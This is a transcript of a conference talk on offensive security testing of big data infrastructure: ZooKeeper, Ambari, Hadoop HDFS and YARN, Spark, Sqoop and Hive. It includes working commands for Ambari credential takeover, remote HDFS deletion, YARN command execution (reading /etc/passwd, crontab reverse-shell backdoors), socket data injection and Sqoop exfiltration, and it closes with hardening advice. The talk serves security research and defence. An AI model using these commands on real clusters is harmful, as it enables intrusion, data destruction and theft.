Hi everyone, welcome to my talk on big data insecurity. I will talk about how we can analyze these big data infrastructures from an offensive point of view. Before starting, let me introduce myself briefly. My name is Sheila. I am Head of Research at Dreamlab Technologies, a Swiss infosec company, and an offensive security specialist with several years of experience. Lately I have focused on security in cloud environments, cloud native, big data and related topics.

Ok, so let's get to the important things. There are some key concepts I would like to explain before jumping into the security part. Probably the first thing that comes to mind when talking about big data is the challenge of storing large volumes of information and the technology that takes care of it. Although that's correct, around the storage technology there are many others of great importance that make up the ecosystem. When we design big data architectures, we have to think about how the data will be transported from the source to the storage, whether the data requires some kind of processing to be consumed, and how the information will be accessed. So the different processes that the data goes through are divided into four main layers that make up the big data stack. We have the data ingestion, that is, the transport of the information from the different origins to the storage place; the storage itself; the data processing layer, because most commonly we ingest raw information that later needs some kind of processing; and finally the data access layer, basically how users will access and consume the information. And let's add one more layer here that is not formally part of the big data stack, but that we find in all big data infrastructures: cluster management, which is really important.

For each of these layers there is a wide variety of technologies that can be implemented, because the big data ecosystem is hugely big. This slide shows a few of the most popular ones, for example Hadoop for storage, Spark and Storm for processing, Impala, Presto and Druid for accessing the information, Flume and Sqoop for ingestion, and ZooKeeper for management. So when we analyze an entire big data infrastructure, we can actually find many different and complex technologies interacting with each other, each fulfilling a different function according to the layer of the stack where it is located.

So let's see an example of a real big data architecture. Here we have two different clouds, one in AWS and another one in any other cloud provider. Both are running some Kubernetes clusters that are serving different applications, and we want to store and analyze the logs of these applications. So we will use Fluent Bit to collect all the application logs, write them to Kafka in the first cloud, and stream them using Flume and Kinesis towards an on-prem Hadoop cluster. Within the Hadoop cluster, the first component that receives the data is a Spark Structured Streaming application. This one takes care of ingesting and also processing the information before dumping it into the Hadoop file system. Once we have our information there, we want to access it, so for that we could implement, for example, Hive and Presto. Or instead of Presto, we could use Impala, Druid, or any other technology for interactive queries against Hadoop. And if we are developing our own software to visualize the information, we will probably have an API talking to the Presto coordinator and a nice frontend. And finally, we have the management layer.
Here it's super common to find Apache ZooKeeper to centralize the configuration of all these components, and also an administration tool like Ambari, or a centralized logging system for cluster monitoring. So this is an example of a real big data architecture and how the components interact with each other.

So, back to security, the question is how we can analyze these complex infrastructures. I would like to propose a methodology for this, where the analysis is based on the different layers of the big data stack, because I think that a good way to analyze big data infrastructures is to dissect them and analyze the security of the components layer by layer. In this way, we can make sure that we are covering all the stages that the information we want to protect goes through. So from now on, I will explain different attack vectors that I found throughout this research, for each of the layers.

Let's start with the management layer. ZooKeeper, as I said, is a widely used tool to centralize the configuration of the different technologies that make up the cluster, and its architecture is pretty simple. It runs its service on all nodes, and then a client, let's say a cluster administrator, can connect to one of the nodes and update the configuration. When that happens, ZooKeeper will automatically broadcast the change across all the nodes. So if we scan a node of the cluster, we will find the ports 2181 and 3888 open, because these ports are opened by ZooKeeper. The port 2181 is the one that accepts connections from clients. Should we be able to connect to it? Well, according to the official documentation of Ambari, a tool that is widely used for deploying on-prem big data clusters, disabling the firewall is a requirement for installing big data clusters. So we can probably connect to ZooKeeper. How should we do it? We can download the ZooKeeper client from the official website; then it's just about running this command, specifying the node IP address and the 2181 port. Once we connect, if we run the help command, there is a list of actions that we can execute over the znodes. The znodes, or ZooKeeper nodes, are the configurations that ZooKeeper organizes in a hierarchical structure. With the ls and get commands, we can browse this hierarchy. We can find very interesting information about the configuration of all the components that make up the cluster, like Hadoop, Hive, HBase, Kafka, whatever, and of course we could use it for further attacks. We can also create new configurations, modify existing ones, and delete configurations, and this actually will be a problem for the cluster: some components might go down, because ZooKeeper, for example, is commonly used to manage Hadoop high availability. So if we delete everything, the cluster might run into trouble. I won't show a demo of this because it's a pretty simple attack, but it's actually quite impactful.
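Just to give you an idea of how simple this is, a session with the official command line client could look roughly like this. The IP address and the znode paths are placeholders of mine; the actual hierarchy depends entirely on the cluster:

    # connect to the ZooKeeper client port of any cluster node
    ./zkCli.sh -server 10.10.10.5:2181

    # browse the znode hierarchy and read configuration values
    ls /
    ls /hadoop-ha
    get /hadoop-ha/mycluster/ActiveBreadCrumb

    # create, modify or delete znodes (this is what can break the cluster)
    create /mynode "some data"
    set /hadoop-ha/mycluster "garbage"
    delete /mynode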
So what about Ambari? This is a pretty popular open source tool to install and manage big data clusters, and it has a dashboard from which you can control everything, whose default credentials are admin / admin, of course. But if they were changed, there is a second door absolutely worth checking. Ambari uses a Postgres database to store the statistics and information about the cluster. In the default installation process, the Ambari wizard asks you to change the credentials for the dashboard, but it doesn't ask you to change the default credentials for the database.

So we could simply connect to the Postgres port directly using these default credentials, the user ambari and the password bigdata, and explore the ambari database. We will find here two tables, user_authentication and users. If we want to get the usernames and authentication keys at once, we need to do an inner join between those two tables. The authentication key is a salted hash, so the best thing that we can do here is to update the key for the admin user, for example. I looked into the Ambari source code to find an already salted hash; here we have the hash for the admin password. So now we can run an update query, and once done we can log into the Ambari dashboard with the admin credentials. Well, I know that this is actually pretty stupid, but it's absolutely worth checking, because Ambari controls the whole cluster: if you can access this dashboard, you can do whatever you want over the cluster. And as the default installation process doesn't ask for these credentials to be changed, then you can most likely compromise them in this way.
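Putting it together, the whole thing is just a couple of queries. This is a sketch from my side: the exact table and column names vary a bit between Ambari versions, and the hash is a placeholder for the value you take from the Ambari source code:

    # connect to the Ambari Postgres database with the default credentials (ambari / bigdata)
    psql -h 10.10.10.5 -p 5432 -U ambari -d ambari

    -- list every user together with its authentication key (a salted hash)
    SELECT u.user_name, a.authentication_key
    FROM users u JOIN user_authentication a ON a.user_id = u.user_id;

    -- overwrite the admin key with a salted hash of a password we know
    UPDATE user_authentication
    SET authentication_key = '<salted-hash-taken-from-the-ambari-source>'
    WHERE user_id = (SELECT user_id FROM users WHERE user_name = 'admin');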
Cool, so the important thing in the cluster management layer is to analyze the security of the administration and monitoring tools.

So let's now talk about the storage layer. First of all, it's good to understand how Hadoop works. It has a master-slave architecture and two main components: HDFS, which means Hadoop Distributed File System, and YARN. HDFS has two main components, the NameNode, which saves the metadata of the files stored in the cluster and runs on the master nodes, and the DataNode, which stores the actual data and runs on the slave nodes. On the other hand, YARN consists of two components as well: the ResourceManager, located on the master nodes, which controls all the processing resources in the Hadoop cluster, and the NodeManager, installed on the slave nodes, which takes care of tracking the processing resources on its slave node, among other tasks. But basically what we have to know is that HDFS, the Hadoop file system, is where the cluster information is stored, and YARN is the service that manages the resources for the processing jobs that are executed over the information stored there.

So when it comes to the storage layer, we are interested in the Hadoop file system, so let's see how we could remotely compromise it. Hadoop exposes an IPC port on 8020 that we should find open in Hadoop clusters. If we can connect to it, we could execute Hadoop commands and access the stored data. However, this is not as simple as the ZooKeeper example was; managing to do this is a little more complex. There are four configuration files that Hadoop needs to perform operations over the Hadoop file system, and if we take a look at these files inside a NameNode, we can see that they have dozens of configuration parameters. So when I saw that, I wondered: if I am an attacker and I don't have access to these files, how can I compromise the file system in a remote way? So part of this research was to find, among those dozens of parameters, which ones are 100% required, and how we can get them remotely from the information that Hadoop itself discloses by default. I will explain now how we can manually craft these files one by one.

Let's start with the core-site.xml file. The only information we need to craft this file is the namespace. This is pretty easy to find: Hadoop exposes by default a dashboard on the NameNodes, on port 50070 (it's a pretty high port), and we can access it without authentication. So as you can see here, we can find the namespace name, and that's all we need for this file. Then we need to craft the hdfs-site.xml file. It's necessary to know the namespace, which we already have from the previous file, and we also need the NameNode IDs and their DNS names. We could have one, two or more NameNodes, and we need to provide the ID and the DNS name for all of them in this file. Where can we get this information? From the same dashboard: we have the namespace here, the NameNode ID and the DNS name. So we would need to access this dashboard on each NameNode; remember that this is on port 50070. Another alternative is to enter the DataNode dashboard on port 50075, where we can see all the NameNodes at once.

The next file is the mapred-site.xml one. Here we need the DNS name of the node that hosts the MapReduce JobHistory server. We can try to access port 19888 on each NameNode; if we can see this dashboard, then that's the node we are looking for, and we already know its DNS name from the previous dashboard. Finally, we need to craft the yarn-site.xml file. Again, we need a node DNS name, in this case the one that hosts the YARN ResourceManager. So we can try to access port 8088, and if we see this dashboard, then that's the right node and we can get its DNS name, of course. All these dashboards are exposed by default and don't require any authentication. But if for some reason we cannot see them, we can try to get this required information through ZooKeeper, with the attack I showed you earlier, because ZooKeeper also has all this information.

Cool, so once we have the configuration files we need, the next step is to install Hadoop on our local machine and provide it with those files to perform the remote communication. As I didn't want to install Hadoop on my local machine, I built this Dockerfile; feel free to use it, it's pretty comfortable. You just need to change the Hadoop version to match the version of your target cluster. So from now on, this is going to be our Hadoop hacking container, running on the attacker machine. Cool, so let's run it and get a shell inside it. We can create a config directory to place the XML files we have crafted before, and we also need to copy the log4j.properties file inside this folder. Another thing I did was to edit the hosts file to resolve these node DNS names. You can actually use the IP addresses in the XML files, but for some reason I had better results doing it this way. Ok, so we are ready to go: we just point Hadoop to this config directory and we can execute, for example, an ls command. So voilà, we can see the entire Hadoop file system from a remote attacker machine.

But before jumping into a demo of this, I would like to mention that most likely we will need to impersonate HDFS users. For example, if I try to create a new directory using the root user, I cannot. So we need to impersonate a user that has privileges within the Hadoop file system, that means one of these ones. Fortunately, that's very easy to do: we just need to set the HADOOP_USER_NAME environment variable before the command, and that's all. That will allow us to create directories, and it will also allow us to delete directories and files, so we could wipe out the entire cluster information.

Ok, so let's see a demo of this. Here I have my files, the core-site.xml with the namespace.
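For reference, the crafted files could look roughly like this. This is just a sketch of mine, assuming the namespace is called mycluster and there are two NameNodes; replace the values with whatever the dashboards show for your target, and in HA setups the failover proxy provider property is usually needed as well:

    <!-- core-site.xml -->
    <configuration>
      <property>
        <name>fs.defaultFS</name>
        <value>hdfs://mycluster</value>
      </property>
    </configuration>

    <!-- hdfs-site.xml -->
    <configuration>
      <property><name>dfs.nameservices</name><value>mycluster</value></property>
      <property><name>dfs.ha.namenodes.mycluster</name><value>nn1,nn2</value></property>
      <property><name>dfs.namenode.rpc-address.mycluster.nn1</name><value>namenode1.target.lan:8020</value></property>
      <property><name>dfs.namenode.rpc-address.mycluster.nn2</name><value>namenode2.target.lan:8020</value></property>
      <property>
        <name>dfs.client.failover.proxy.provider.mycluster</name>
        <value>org.apache.hadoop.hdfs.server.namenode.ha.ConfiguredFailoverProxyProvider</value>
      </property>
    </configuration>

With those files (plus mapred-site.xml and yarn-site.xml) in the config directory, the kind of command we end up running from the container is something like: HADOOP_USER_NAME=hdfs hadoop --config ./config fs -ls /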
I also have the hdfs-site.xml file. This one has more information: the namespace and also the NameNodes. For the NameNodes I need to specify the DNS names; I have two NameNodes in this case, so I need to specify the DNS name for both of them. And then this last property was something that I had to add for this specific cluster. The mapred-site.xml has the DNS name for the MapReduce JobHistory address, the node that hosts this resource. For the yarn-site.xml I had to specify the DNS name as well, for the ResourceManager node. So once we have those files, we are ready to go and we can execute Hadoop commands over the remote file system. If we check the help for the hadoop fs commands, we can find the commands that are super common in any Unix system to remove, copy, delete, move files and so on. To impersonate, we need to specify the environment variable as we saw before, and here we can create directories, modify files, or delete any directory, right? Good.

So let's now talk about the processing layer and how we can abuse YARN in this case. Back to the Hadoop architecture, just to remember: YARN takes care of the processing jobs over the data, and these jobs execute code on the DataNodes. So our mission here is to try to find a way to remotely submit an application to YARN that executes the code or command that we want to execute on the cluster nodes; basically, achieve remote code execution through YARN. We can use the Hadoop IPC that we were using in the previous attack. It's just necessary to improve our yarn-site.xml file a little bit: we need to add the yarn.application.classpath property. This path used to be the default path in Hadoop installations, so it should not be difficult to figure out this information; in the example here we can see the default path for installations using the Hortonworks packages. Then this other property is optional: it specifies the application output path in the Hadoop file system. It might be useful for us to easily find the output of our remote code execution, but it's not necessary. And something I would like to mention that I didn't say before: if we can access those panels that we have seen, under /conf we can find all the configuration parameters. You cannot just download and use that file, we still need to manually craft the files the way we were doing it. However, if something is not working for you, here you might find what's missing. For example, here we have the path that we are looking for, for the property we have to set in this case.

Good. So now that we have improved our yarn-site.xml file and we can submit an application to YARN, the question is: what application should we submit? Here Hortonworks provides a simple one that is enough for us to achieve the remote code execution that we want. It has only three Java files. YARN applications are developed in Java, but there are a lot of Hadoop libraries that need to be included and used, so it might not be so easy to develop a native YARN application; but we can use this one for our purpose. It takes as parameters the command to be executed on the cluster nodes and the number of instances, which is basically on how many nodes our command will be executed, right? So we will clone this repository in our Hadoop hacking container and proceed to compile this YARN application. We need to edit the pom.xml file and change the Hadoop version to match the version of our target. This is really important, otherwise this is not going to work. So once we do that, we can compile the application using Maven. Good.
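In the container, the preparation boils down to a couple of commands, something like the following. I'm assuming the usual GitHub location of the Hortonworks example here, so adjust the URL and versions to your target:

    # clone the simple YARN application and build it against the target's Hadoop version
    git clone https://github.com/hortonworks/simple-yarn-app.git
    cd simple-yarn-app

    # edit pom.xml so the Hadoop dependency version matches the target cluster, then build
    mvn clean package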
So the next step is to copy the compiled JAR into the remote Hadoop file system. We can do it using the copyFromLocal HDFS command, and after that we are ready to go. In this way we can submit the application to YARN, passing as parameters the command that we want to execute and the number of instances. Here, for example, I have executed the hostname command over three nodes. We are going to receive an application ID, and it's important to take note of it. But it's even more important to get the FINISHED status, because that means that our application was executed successfully. And now what? Where can we see the application output? This is what we are interested in, right? Well, we can use this command, passing the application ID we got in the previous step, and the output is going to be something like this: we have executed the command over three nodes, so we have three different outputs for the hostname command. Of course, we can change the hostname command for any other, right?

So let's see a demo of this. Here I have improved the yarn-site.xml file to add the path I need to add, and I have my simple YARN application from Hortonworks, which I already uploaded to the Hadoop file system. So remember, you can simply copyFromLocal and just upload the JAR to the remote Hadoop target. And now, with this command, we have to specify the local path of the JAR file, the command that we want to execute, the number of instances (the nodes) and the remote path. With this command we are going to get our application ID and the status. So now we need to use this application ID. In my case I needed to move the output from one directory to another one, just to allow YARN to find the output in the next command; it might not be necessary for you. So with the yarn logs command we can just get the output of this application, and we are going to see the output for the three nodes: we have the hostname output for hadoop1, the first node, hadoop2 and hadoop3. Good. Let me show you one more: I submitted one more application before, to dump a file from the nodes, in this case the /etc/passwd file. So here we can see the passwd file for the three nodes as well. So basically you can change this and execute whatever command you want; it's pretty easy to use.

It also should be quite simple to change this YARN application to execute perhaps a more complex command. Just keep in mind that any changes must be made both in the ApplicationMaster file, as we can see here in the slide, and also in the Client file. So, for example, if we want to get something like a reverse shell on the cluster nodes, it's possible. But keep in mind that this is a job that starts and finishes, so we might need to use alternatives like backdooring the crontab with the YARN application, for example: you execute that command with the YARN application, the crontab gets backdoored, and then you will have your reverse shell on every node of the cluster. Good.
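To recap the whole flow from the attacker machine, it ends up being something like this. The JAR name, class name, paths and application ID are placeholders based on the Hortonworks example, so adjust them to your own build:

    # upload the compiled JAR to the remote Hadoop file system
    HADOOP_USER_NAME=hdfs hadoop fs -copyFromLocal simple-yarn-app-1.1.0.jar /apps/simple/

    # submit the application: command to run, number of instances, and the JAR location in HDFS
    HADOOP_USER_NAME=hdfs hadoop jar simple-yarn-app-1.1.0.jar \
      com.hortonworks.simpleyarnapp.Client "hostname" 3 /apps/simple/simple-yarn-app-1.1.0.jar

    # once the application reaches the FINISHED state, fetch its output
    yarn logs -applicationId application_1234567890123_0001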
Let me also talk about Spark in this section. Spark is a super popular technology for processing data as well. It's generally installed on top of Hadoop, and developers write data processing applications for Spark, for example in Python using PySpark, because it's easier than developing a native application for YARN, and Spark has other advantages over YARN as well. So as we can see here, Spark has its own IPC port on 7077, and we can submit a Spark application to be executed on the cluster through this port. It's easier than with YARN. Here we have an example: this small piece of code will connect to the Spark master to execute the hostname command on every cluster node. We simply need to specify the remote Spark master IP address, our own IP address to receive the output of the command, and the command itself, and then we run this script from our machine. We don't need anything else, it's quite simple. But I'm not going to talk in depth about this, because there is already a talk 100% dedicated to Spark that was given at DEF CON, so I truly recommend watching it. The speaker explains how to achieve remote code execution via the Spark IPC, which is the equivalent of what we did with YARN. So keep in mind that Spark may or may not be present in the cluster, while YARN will always be present in Hadoop installations. So it's good to know how to achieve remote code execution via YARN and also via Spark; we have the possibility to abuse this technology as well.

Awesome. So let's take a look at the ingestion layer now. If you remember from our big data architecture example at the beginning of this talk, we have sources of data, and such data is ingested into our cluster using data ingestion technologies. There are several ones: we have some designed for streaming, like Flume, Kafka and Spark Structured Streaming, which is a variant of Spark, and then others like Sqoop that ingest static information, for example from one data lake to another data lake, from a database to a data lake, and so on. So from a security point of view, we need to make sure that these channels that the information goes through, from the source to the storage, are secure, right? Otherwise an attacker might interfere with those channels and inject malicious data. Let's see how this could happen.

This is how Spark Streaming, or Spark Structured Streaming, works. It's a variant of Spark that ingests data and also processes it before dumping everything into the Hadoop file system, so it's like two components in one. Spark Structured Streaming works with technologies like Kafka, Flume and Kinesis to pull or receive the data, and it also has the possibility to just ingest data from a TCP socket, and that can be pretty dangerous. Here we have an example of what the code looks like when the streaming input used is a TCP socket: it basically reads whatever arrives on a given socket. So abusing it is super easy: we can use netcat or our favorite tool and just send data over that socket, and it works. What happens to the data that we inject will depend on the application that processes it. Most likely we will crash the application, because we might be injecting bytes that the application doesn't know how to handle, or our bytes might end up inside the Hadoop file system; that's also likely. So it's important to check that the interfaces that are waiting for data to be ingested cannot be reached by an attacker.
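The pattern looks roughly like this. This is my own minimal sketch, not the exact code on the slide, and the host, port and HDFS paths are placeholders; the point is that the socket source ingests whatever it reads from the configured endpoint, with no validation at all:

    # minimal PySpark Structured Streaming job ingesting from a TCP socket
    from pyspark.sql import SparkSession

    spark = SparkSession.builder.appName("socket-ingestion").getOrCreate()

    # read everything that arrives on this host:port
    lines = (spark.readStream.format("socket")
             .option("host", "ingest.target.lan")
             .option("port", 9999)
             .load())

    # dump it straight into HDFS
    query = (lines.writeStream.format("parquet")
             .option("path", "hdfs:///data/ingested")
             .option("checkpointLocation", "hdfs:///data/checkpoints")
             .start())
    query.awaitTermination()

From the attacker's perspective, whoever controls or can reach that endpoint, for example by serving it with nc -lk 9999 where the job expects its data source, can push arbitrary bytes into the pipeline.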
Regarding Sqoop, as I said, it moves static data; it's commonly used to ingest information from different SQL databases into Hadoop. Analyzing a Sqoop server, I found an API exposed by default on port 12000. We can get the Sqoop server version, for example, using this query, but there is not much documentation about the API, and honestly it's much easier to abuse this using the Sqoop client. Something important is to download the same client version as the server: for example, this server is 1.99.7, so we should download that version of the client from this website. So what can we do? Well, we could, for example, ingest malicious data from a database that belongs to the attacker into the target Hadoop file system. That takes some steps. We have to connect to the remote Sqoop server and create some links, which provide Sqoop with the information to connect to the malicious database and to the target Hadoop file system. Then we have to create a Sqoop job, specifying that we want to ingest data from this database link to this other HDFS link, and start it. This is much easier to understand with a demo, so let's see a video demo of this.

So here I have my Sqoop client and I am connected to the remote Sqoop server. These are the connectors we have available. We need to create a link for the MySQL database, the remote attacker database, so I specify the MySQL driver, the remote address of the database, and some credentials to access it; most of the other parameters are optional, so I just create it. We also need to create a link for the HDFS target. Here we have to specify two parameters. The first one is the remote address of the Hadoop IPC; in this case it's on port 9000, but it's going to be most likely on 8020, as we saw before. And the conf directory is a remote path, not a local one: it's going to be the Hadoop installation path by default. Here I'm specifying the path of this demo machine, but it's most likely going to be /etc/hadoop/conf. So now we have the links, and we have to create a job. In the job we specify that we want to ingest data from the attacker MySQL database to the target HDFS, so we need to specify the name of the table we are going to ingest; most of the other parameters are optional, so I leave them blank. When we create the job, we also have to specify the output directory, and that's important too: that's a remote directory in the Hadoop file system. So, right, now we have our InjectMaliciousData job, and we just need to start it. And this is all we are going to see on the attacker machine. But to show you that we actually injected malicious data, I will log into the remote machine that hosts the Hadoop file system, just to show that the data was actually injected. Here we have the hacking-Hadoop data, and the "hello blah blah" entries; this is just data that was in my remote MySQL database and that I injected into the Hadoop file system via Sqoop. So keep in mind that you can ingest malicious data, but you can also export data, because Sqoop allows you to import and export. So you can do this in the reverse way and just steal data from the Hadoop file system into your remote MySQL database, for example.
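The whole interaction from the Sqoop 2 shell looks more or less like this. It's a sketch: the exact flags and prompts vary a bit between 1.99.x versions, and the link and job names are just placeholders I chose:

    # start the Sqoop 2 shell and point it at the remote server
    sqoop2-shell
    sqoop:000> set server --host 10.10.10.5 --port 12000 --webapp sqoop
    sqoop:000> show version --all
    sqoop:000> show connector

    # one link for the attacker MySQL database, one for the target HDFS
    sqoop:000> create link -connector generic-jdbc-connector
    sqoop:000> create link -connector hdfs-connector

    # a job from the first link to the second, then run it
    sqoop:000> create job -f attacker-mysql -t target-hdfs
    sqoop:000> start job -name inject-malicious-data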
Good. So finally, let's talk a little bit about the data access layer. Back to our architecture example, we saw that it's possible to use different technologies for data access. In this example we are using Presto together with Hive, but there are many others. And when it comes to Hive and HBase, these are HDFS-based storage technologies, but they also provide interfaces to access the information; for example, Presto needs the Hive Metastore to query the information stored in the Hadoop file system. So these technologies expose dashboards and interfaces that can be abused by an attacker if they are not properly protected. For example, Hive exposes a dashboard on port 10002 where we can get interesting information and also an idea of how the data is structured in the storage. The same goes for HBase.

Regarding Presto, I found this curious login form where a password is not allowed. It's quite curious because it's a login form, but you cannot enter a password. I know that you can set one up, but by default it seems to be this way. So you can just write the admin user there and enter, and there is a dashboard that shows some information about the interactive queries being executed against the cluster. Good. So, as I said, these technologies expose several interfaces, and it's common to find at least a JDBC one. For example, in Hive we can find it on port 10000, and there are different clients that we can use to connect to it, like SQuirreL, for example; Hive even includes Beeline. We can connect to the remote Hive server just by specifying the remote address, if no authentication is required, and there is usually none by default. And Hive has its own commands; we need to know them to browse the information. With SHOW DATABASES we can see the databases in the cluster, select one, and SHOW TABLES; and then we have sentences to insert, update and delete, like in any other SQL database. Good.

So, I'm running out of time, so let's give some recommendations as a conclusion. Many attacks that we saw throughout this talk were based on exposed interfaces, and there are many dashboards that are exposed by default as well. So, if they are not being used, we should either remove them or block access to them using a firewall, for example. If some components need to talk to each other without a firewall in the middle, then we should secure the perimeter at least; the firewall has to be present. Even though the official documentation asks for the firewall to be disabled, I believe that we can investigate what ports need to be allowed in our infrastructure and design good firewall policy rules. And remember also to change all the default credentials and implement some kind of authentication in all the technologies being used. Hadoop supports authentication for HDFS, and it's actually possible to implement authentication and authorization in most of the technologies that we have seen, but we have to do it, because by default there is nothing implemented. Finally, remember that in a big data infrastructure there are many different technologies communicating with each other, so make sure that those communications are happening in a secure way.

Good. So, in the next weeks I hope to be able to publish more resources about the practical implementation of security measures. So, for today, that's all. Thank you for watching my talk, and here's my contact information in case you have any questions; please feel free to reach out to me. Thank you so much. Bye-bye.